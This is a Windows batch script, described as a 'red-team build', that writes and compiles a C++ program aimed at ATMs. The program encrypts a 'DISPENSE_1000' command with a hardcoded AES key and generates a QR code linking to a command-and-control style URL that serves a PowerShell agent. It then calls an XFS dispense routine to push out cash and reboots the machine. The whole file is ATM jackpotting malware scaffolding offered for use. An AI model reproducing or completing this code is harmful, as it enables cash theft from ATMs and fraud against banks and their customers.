@echo off
:: =============================
:: Mir$$ Windows Red-Team Build (C++ + WinAPI + AES + QR + Dispenser)
:: =============================

set SRC_DIR=src\desktop
mkdir %SRC_DIR% 2>nul >nul

echo Writing full main.cpp...
>%SRC_DIR%\main.cpp echo #include <windows.h>
>>%SRC_DIR%\main.cpp echo #include <iostream>
>>%SRC_DIR%\main.cpp echo #include <string>
>>%SRC_DIR%\main.cpp echo #include "aes.h" // Include your AES logic here
>>%SRC_DIR%\main.cpp echo #include "qrgen.h" // Include your QR generation logic here
>>%SRC_DIR%\main.cpp echo #include "xfs_dispense.h" // ATM dispense header
>>%SRC_DIR%\main.cpp echo
>>%SRC_DIR%\main.cpp echo int WINAPI WinMain(HINSTANCE hInstance, HINSTANCE hPrevInstance, LPSTR lpCmdLine, int nCmdShow) {
>>%SRC_DIR%\main.cpp echo     std::string amount = "1000"; // default or parse from encrypted input
>>%SRC_DIR%\main.cpp echo     std::string payload = "DISPENSE_" + amount;
>>%SRC_DIR%\main.cpp echo     std::string encrypted = AES_Encrypt(payload, "ThisKeyForAES256");
>>%SRC_DIR%\main.cpp echo     std::string qr = GenerateQR("https://c2.atm.local/launch_agent.ps1?code=" + encrypted);
>>%SRC_DIR%\main.cpp echo     SaveQRToDesktop(qr); // Save image to desktop
>>%SRC_DIR%\main.cpp echo     TriggerDispenser(amount); // Execute dispense via XFS
>>%SRC_DIR%\main.cpp echo     ExitWindowsEx(EWX_REBOOT, 0); // Optional reboot
>>%SRC_DIR%\main.cpp echo     return 0;
>>%SRC_DIR%\main.cpp echo }

echo Compiling app...
cl /EHsc /FeMirRed.exe %SRC_DIR%\main.cpp user32.lib gdi32.lib shell32.lib

if exist MirRed.exe (
  echo.
  echo ✅ Build complete: MirRed.exe
) else (
  echo.
  echo ❌ Build failed.
)

pause
